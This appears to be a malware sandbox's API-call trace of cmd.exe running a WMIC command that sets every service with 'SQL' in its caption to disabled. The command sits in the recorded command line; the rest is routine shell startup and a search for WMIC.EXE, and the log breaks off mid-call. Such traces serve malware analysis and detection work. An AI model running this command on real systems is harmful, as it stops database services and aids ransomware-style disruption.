0xf24 [0115.538] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0115.538] __set_app_type (_Type=0x1) [0115.538] __p__fmode () returned 0x77ac4d6c [0115.538] __p__commode () returned 0x77ac5b1c [0115.538] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0115.538] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0115.538] GetCurrentThreadId () returned 0xf24 [0115.538] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf24) returned 0x84 [0115.538] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0115.538] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0115.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.541] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.541] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x450f7d4 | out: phkResult=0x450f7d4*=0x0) returned 0x2 [0115.541] VirtualQuery (in: lpAddress=0x450f7db, lpBuffer=0x450f78c, dwLength=0x1c | out: lpBuffer=0x450f78c*(BaseAddress=0x450f000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0115.541] VirtualQuery (in: lpAddress=0x4410000, lpBuffer=0x450f78c, dwLength=0x1c | out: lpBuffer=0x450f78c*(BaseAddress=0x4410000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0115.541] VirtualQuery (in: lpAddress=0x4411000, lpBuffer=0x450f78c, dwLength=0x1c | out: lpBuffer=0x450f78c*(BaseAddress=0x4411000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0115.541] VirtualQuery (in: lpAddress=0x4413000, lpBuffer=0x450f78c, dwLength=0x1c | out: lpBuffer=0x450f78c*(BaseAddress=0x4413000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0115.541] VirtualQuery (in: lpAddress=0x4510000, lpBuffer=0x450f78c, dwLength=0x1c | out: lpBuffer=0x450f78c*(BaseAddress=0x4510000, AllocationBase=0x4510000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0115.541] GetConsoleOutputCP () returned 0x1b5 [0115.541] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0115.541] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0115.541] _get_osfhandle (_FileHandle=1) returned 0x3c [0115.541] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0115.542] _get_osfhandle (_FileHandle=1) returned 0x3c [0115.542] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0115.542] _get_osfhandle (_FileHandle=1) returned 0x3c [0115.542] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0115.542] _get_osfhandle (_FileHandle=0) returned 0x38 [0115.542] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0115.542] _get_osfhandle (_FileHandle=0) returned 0x38 [0115.542] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0115.542] GetEnvironmentStringsW () returned 0x4667df8* [0115.542] FreeEnvironmentStringsA (penv="A") returned 1 [0115.543] GetEnvironmentStringsW () returned 0x4667df8* [0115.543] FreeEnvironmentStringsA (penv="A") returned 1 [0115.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450e738 | out: phkResult=0x450e738*=0x94) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x0, lpData=0x450e744*=0x53, lpcbData=0x450e740*=0x1000) returned 0x2 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x4, lpData=0x450e744*=0x1, lpcbData=0x450e740*=0x4) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x0, lpData=0x450e744*=0x1, lpcbData=0x450e740*=0x1000) returned 0x2 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x4, lpData=0x450e744*=0x0, lpcbData=0x450e740*=0x4) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x4, lpData=0x450e744*=0x40, lpcbData=0x450e740*=0x4) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x4, lpData=0x450e744*=0x40, lpcbData=0x450e740*=0x4) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x0, lpData=0x450e744*=0x40, lpcbData=0x450e740*=0x1000) returned 0x2 [0115.543] RegCloseKey (hKey=0x94) returned 0x0 [0115.543] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450e738 | out: phkResult=0x450e738*=0x94) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x0, lpData=0x450e744*=0x40, lpcbData=0x450e740*=0x1000) returned 0x2 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x4, lpData=0x450e744*=0x1, lpcbData=0x450e740*=0x4) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x0, lpData=0x450e744*=0x1, lpcbData=0x450e740*=0x1000) returned 0x2 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x4, lpData=0x450e744*=0x0, lpcbData=0x450e740*=0x4) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x4, lpData=0x450e744*=0x9, lpcbData=0x450e740*=0x4) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x4, lpData=0x450e744*=0x9, lpcbData=0x450e740*=0x4) returned 0x0 [0115.543] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450e73c, lpData=0x450e744, lpcbData=0x450e740*=0x1000 | out: lpType=0x450e73c*=0x0, lpData=0x450e744*=0x9, lpcbData=0x450e740*=0x1000) returned 0x2 [0115.543] RegCloseKey (hKey=0x94) returned 0x0 [0115.543] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29824 [0115.543] srand (_Seed=0x5ad29824) [0115.543] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'" [0115.543] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'" [0115.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0115.543] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4669d50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0115.544] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0115.544] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.544] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0115.544] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0115.544] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0115.544] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0115.544] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0115.544] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0115.544] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0115.544] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0115.544] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0115.544] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0115.544] GetEnvironmentStringsW () returned 0x4667df8* [0115.544] FreeEnvironmentStringsA (penv="A") returned 1 [0115.544] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.544] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0115.544] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0115.544] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0115.544] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0115.544] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0115.544] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0115.544] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0115.544] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0115.544] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0115.544] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x450f510 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0115.544] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x450f510, lpFilePart=0x450f508 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450f508*="Desktop") returned 0x1d [0115.544] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0115.545] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x450f290 | out: lpFindFileData=0x450f290) returned 0x46605c8 [0115.545] FindClose (in: hFindFile=0x46605c8 | out: hFindFile=0x46605c8) returned 1 [0115.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x450f290 | out: lpFindFileData=0x450f290) returned 0x46605c8 [0115.545] FindClose (in: hFindFile=0x46605c8 | out: hFindFile=0x46605c8) returned 1 [0115.545] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0115.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x450f290 | out: lpFindFileData=0x450f290) returned 0x46605c8 [0115.545] FindClose (in: hFindFile=0x46605c8 | out: hFindFile=0x46605c8) returned 1 [0115.545] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0115.545] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0115.545] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0115.545] GetEnvironmentStringsW () returned 0x4667df8* [0115.545] FreeEnvironmentStringsA (penv="=") returned 1 [0115.545] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0115.546] GetConsoleOutputCP () returned 0x1b5 [0115.546] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0115.546] GetUserDefaultLCID () returned 0x409 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x450f640, cchData=128 | out: lpLCData="0") returned 2 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x450f640, cchData=128 | out: lpLCData="0") returned 2 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x450f640, cchData=128 | out: lpLCData="1") returned 2 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0115.546] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0115.546] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0115.547] GetConsoleTitleW (in: lpConsoleTitle=0x466aae0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.547] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0115.547] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0115.547] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0115.547] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0115.548] GetEnvironmentVariableW (in: lpName="SQL", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0115.548] _wcsicmp (_String1="SQL", _String2="CD") returned 16 [0115.548] _wcsicmp (_String1="SQL", _String2="ERRORLEVEL") returned 14 [0115.548] _wcsicmp (_String1="SQL", _String2="CMDEXTVERSION") returned 16 [0115.548] _wcsicmp (_String1="SQL", _String2="CMDCMDLINE") returned 16 [0115.548] _wcsicmp (_String1="SQL", _String2="DATE") returned 15 [0115.548] _wcsicmp (_String1="SQL", _String2="TIME") returned -1 [0115.548] _wcsicmp (_String1="SQL", _String2="RANDOM") returned 1 [0115.548] _wcsicmp (_String1="SQL", _String2="HIGHESTNUMANODENUMBER") returned 11 [0115.548] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0115.548] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0115.548] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0115.548] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0115.548] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0115.548] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0115.548] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0115.550] GetConsoleTitleW (in: lpConsoleTitle=0x450f328, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.550] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0115.550] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0115.550] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0115.550] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0115.550] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0115.550] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0115.550] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0115.550] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0115.550] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0115.550] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0115.550] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0115.550] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0115.550] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0115.550] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0115.550] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0115.550] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0115.550] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0115.550] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0115.550] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0115.550] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0115.550] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0115.550] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0115.550] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0115.550] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0115.550] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0115.550] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0115.550] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0115.551] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0115.551] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0115.551] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0115.551] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0115.551] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0115.551] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0115.551] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0115.551] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0115.551] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0115.551] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0115.551] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0115.551] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0115.551] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0115.551] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0115.551] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0115.551] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0115.551] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0115.551] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0115.551] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0115.551] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0115.551] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0115.551] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0115.551] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0115.551] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0115.551] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0115.551] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0115.551] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0115.551] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0115.551] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0115.551] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0115.551] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0115.551] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0115.551] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0115.551] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0115.551] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0115.551] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0115.551] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0115.551] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0115.551] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0115.551] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0115.551] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0115.551] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0115.551] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0115.551] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0115.551] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0115.551] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0115.551] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0115.551] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0115.551] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0115.551] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0115.551] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0115.551] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0115.551] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0115.551] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0115.552] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0115.552] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0115.552] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0115.552] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0115.552] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0115.552] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0115.552] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0115.552] SetErrorMode (uMode=0x0) returned 0x0 [0115.552] SetErrorMode (uMode=0x1) returned 0x0 [0115.552] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46605d0, lpFilePart=0x450ee34 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450ee34*="Desktop") returned 0x1d [0115.552] SetErrorMode (uMode=0x0) returned 0x1 [0115.552] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0115.552] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0115.557] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.559] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebc0) returned 0xffffffff [0115.559] GetLastError () returned 0x2 [0115.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.559] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebc0) returned 0xffffffff [0115.559] GetLastError () returned 0x2 [0115.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebc0) returned 0xffffffff [0115.559] GetLastError () returned 0x2 [0115.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebc0) returned 0xffffffff [0115.559] GetLastError () returned 0x2 [0115.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x450ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebc0) returned 0x466b420 [0115.560] FindClose (in: hFindFile=0x466b420 | out: hFindFile=0x466b420) returned 1 [0115.560] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x450ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebc0) returned 0xffffffff [0115.560] GetLastError () returned 0x2 [0115.560] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x450ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450ebc0) returned 0x466b420 [0115.560] FindClose (in: hFindFile=0x466b420 | out: hFindFile=0x466b420) returned 1 [0115.560] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0115.560] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0115.560] GetConsoleTitleW (in: lpConsoleTitle=0x450f0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.560] InitializeProcThreadAttributeList (in: lpAttributeList=0x450efe0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x450efc4 | out: lpAttributeList=0x450efe0, lpSize=0x450efc4) returned 1 [0115.560] UpdateProcThreadAttribute (in: lpAttributeList=0x450efe0, dwFlags=0x0, Attribute=0x60001, lpValue=0x450efcc, cbSize=0x4, lpPreviousValue=0x0, 